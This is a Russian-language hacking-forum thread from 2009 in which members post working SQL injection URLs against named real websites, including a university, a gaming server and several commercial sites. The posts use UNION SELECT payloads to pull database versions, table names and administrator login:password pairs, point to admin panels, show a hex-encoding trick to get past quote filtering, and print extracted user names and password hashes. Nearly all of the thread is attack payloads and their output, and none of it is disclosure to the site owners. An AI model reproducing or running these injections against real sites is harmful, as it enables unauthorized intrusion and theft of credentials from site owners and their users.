ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2
Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #7391  
Старый 08.01.2009, 03:51
Аватар для Merl00k
Merl00k
Познающий
Регистрация: 06.11.2008
Сообщений: 32
Провел на форуме:
934986

Репутация: 21
По умолчанию

Цитата:
Как можно посмотреть что выдало при такой скуле. Просто на экране ни че не видо или я не вижу -(
На скока если я знаю инъекция вслепую то некак
 
Ответить с цитированием

  #7392  
Старый 08.01.2009, 04:09
Аватар для sabe
sabe
Постоянный
Регистрация: 16.03.2007
Сообщений: 380
Провел на форуме:
1404552

Репутация: 568
Отправить сообщение для sabe с помощью ICQ Отправить сообщение для sabe с помощью AIM Отправить сообщение для sabe с помощью Yahoo
По умолчанию

Aedes.com - PR 4 ~1к
Цитата:
http://www.aedes.com/brand.php?cat_id=-3+union+select+1,2,unhex(hex(version()))--
Northcoast101.com - PR 4 ~1к
Цитата:
http://www.northcoast101.com/menus/index.php?cat_id=-17+union+select+unhex(hex(version()))/*
4 ветка
Цитата:
http://www.northcoast101.com/menus/index.php?cat_id=-17+union+select+unhex(hex(concat_ws(0x3a,name,pass word,email)))+from+LUM_User/*
/admin

Dsmi.tobw.net - PR 4 ~1к
Цитата:
http://dsmi.tobw.net/index.php?cat_id=1+union+select+1,2,3,4+limit+0,1/*
(

Nlstar.com - PR 3 ~0.7к
Цитата:
http://www.nlstar.com/catalog/index.php?cat_id=00000017|%'+union+select+1,2,vers ion(),4/*
еще какойто..

Последний раз редактировалось sabe; 08.01.2009 в 06:28..
 
Ответить с цитированием

  #7393  
Старый 08.01.2009, 04:11
Аватар для zifanchuck
zifanchuck
Постоянный
Регистрация: 27.10.2008
Сообщений: 491
Провел на форуме:
4002393

Репутация: 464
Отправить сообщение для zifanchuck с помощью ICQ
По умолчанию

Цитата:
http://www.tspu.edu.ru/?ur=-284+union+select+1,version(),3,4,5,6,7,8,9,10,11,1 2,13,14,15--
версия 5.0.70-log

[QUOTE]http://www.tspu.edu.ru/?ur=-284+union+select+1,table_name,3,4,5,6,7,8,9,10,11, 12,13,14,15+from+INFORMATION_SCHEMA.TABLES--
Цитата:

имена таблиц
http://www.tspu.edu.ru/?ur=-284+union+select+1,concat(login,0x3a,password),3,4 ,5,6,7,8,9,10,11,12,13,14,15+from+administrtion--[QUOTE]

логин:пасс админов

http://tspu.edu.ru/admins/ админка

Последний раз редактировалось zifanchuck; 08.01.2009 в 04:19..
 
Ответить с цитированием

  #7394  
Старый 08.01.2009, 04:15
Аватар для Merl00k
Merl00k
Познающий
Регистрация: 06.11.2008
Сообщений: 32
Провел на форуме:
934986

Репутация: 21
По умолчанию

Assembler

там нету уязвимости
 
Ответить с цитированием

  #7395  
Старый 08.01.2009, 04:33
Аватар для sharoff
sharoff
Познающий
Регистрация: 05.08.2007
Сообщений: 30
Провел на форуме:
242062

Репутация: 18
Отправить сообщение для sharoff с помощью ICQ
По умолчанию

Цитата:
Сообщение от Merl00k  
Assembler

там нету уязвимости
Код:
http://wow.cybergame.su/index.php?newsid=-1+union+select+1,2,3,4,5,6+from+information_schema.tables--
судя по отсутствии ошибки при запросе к information_schema, версия там пятая, но вывода что-то не замечаю...
 
Ответить с цитированием

  #7396  
Старый 08.01.2009, 04:44
Аватар для Merl00k
Merl00k
Познающий
Регистрация: 06.11.2008
Сообщений: 32
Провел на форуме:
934986

Репутация: 21
По умолчанию

sharoff

а ты уверен что там есть бага ?
 
Ответить с цитированием

  #7397  
Старый 08.01.2009, 05:00
Аватар для R1dex
R1dex
Участник форума
Регистрация: 17.09.2008
Сообщений: 211
Провел на форуме:
1571865

Репутация: 571
Отправить сообщение для R1dex с помощью ICQ
По умолчанию

Цитата:
Сообщение от Merl00k  
sharoff

а ты уверен что там есть бага ?
Код:
http://wow.cybergame.su/index.php?newsid=-1+union+select+1,2,3,4,5--
Выдает: The used SELECT statements have a different number of columns

Код:
http://wow.cybergame.su/index.php?newsid=-1+union+select+1,2,3,4,5,6--
Ошибка исчезла.

Итог:

6 стоблоцов, вывода нет.

ЗЫ: В этой теме выкладывать инъект, а вопросы - в соседней.
 
Ответить с цитированием

  #7398  
Старый 08.01.2009, 05:11
Аватар для Assembler
Assembler
Участник форума
Регистрация: 01.09.2007
Сообщений: 203
Провел на форуме:
812964

Репутация: 302
Отправить сообщение для Assembler с помощью ICQ
По умолчанию

Код:
http://wow.cybergame.su/index.php?newsid=-25+union+select+1,2,3,column_name,5,6+from+informa tion_schema.columns+where+table_name='account'--
И опять что то не то.
 
Ответить с цитированием

  #7399  
Старый 08.01.2009, 05:19
Аватар для sharoff
sharoff
Познающий
Регистрация: 05.08.2007
Сообщений: 30
Провел на форуме:
242062

Репутация: 18
Отправить сообщение для sharoff с помощью ICQ
По умолчанию

Цитата:
Сообщение от Assembler  
Код:
http://wow.cybergame.su/index.php?newsid=-25+union+select+1,2,3,column_name,5,6+from+informa tion_schema.columns+where+table_name='account'--
И опять что то не то.
Код:
http://wow.cybergame.su/index.php?newsid=-25+union+select+1,2,3,column_name,5,6+from+information_schema.columns+where+table_name=0x6163636f756e74--
Там стоит фильтрация кавычек, пользуемся hex
0x6163636f756e74 представляет собой запись account


Еще раз повторяю, вывода там нету, никакой column_name ты не увидишь.

Последний раз редактировалось sharoff; 08.01.2009 в 05:21..
 
Ответить с цитированием

  #7400  
Старый 08.01.2009, 11:50
Аватар для z00MAN
z00MAN
Постоянный
Регистрация: 20.11.2008
Сообщений: 406
Провел на форуме:
2358980

Репутация: 930
Thumbs up

Код:
http://www.winlinanswers.com/book/resources.php?id=8'+union+select+1,concat(user(),0x3a,version(),0x3a,database()),3,4,5   ,6,7,8,9,10,11/*
user(): jeremym@localhost
version(): 4.1.22
database(): MOSKOWITZ
PR: 6


Код:
http://www.admanager.nl/online/page.php?id=-8+union+select+1,concat(user(),0x3a,version(),0x3a,database()),3,4--
user(): admanager@toscane.eid.nl
version(): 4.1.22
database(): admanager
PR: 5


Код:
http://www.fhmbuurmeisje.nl/profile.php?id=-8+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,concat(user(),0x3a,ve   rsion(),0x3a,database())--
user(): ttg-db@localhost
version(): 4.1.20-log
database(): ttg-fhm
PR: 3


Код:
http://www.pca.org.au/?id=-8+union+select+1,2,concat(user(),0x3a,version(),0x3a,database()),4,5,6,7,8,9,10,11,12--
user(): mypca1005@ws-shared-9.private.netregistry.net
version(): 5.0.32-Debian_7etch6-log
database(): pca_pca_org_au
PR: 5

нашёл таблицу tblmemberlogin, в ней одно поле "txtPassword"

в таблице всего два хэша:
b334044a3535f437c14f24c1e76ae3fb
5f4dcc3b5aa765d61d8327deb882cf99:password

логина нет (толком не искал)
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Обнаружение Sql инъекций в Oracle, часть вторая k00p3r Чужие Статьи 0 13.06.2005 11:26
SQL инъекция и Oracle, часть 2 k00p3r Чужие Статьи 0 13.06.2005 11:24
Sql инъекция и Oracle, часть первая k00p3r Чужие Статьи 0 13.06.2005 11:23
Внедрение Sql кода с завязанными глазами k00p3r Чужие Статьи 0 12.06.2005 20:48
SQL Injection в Oracle k00p3r Чужие Статьи 0 12.06.2005 12:41



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ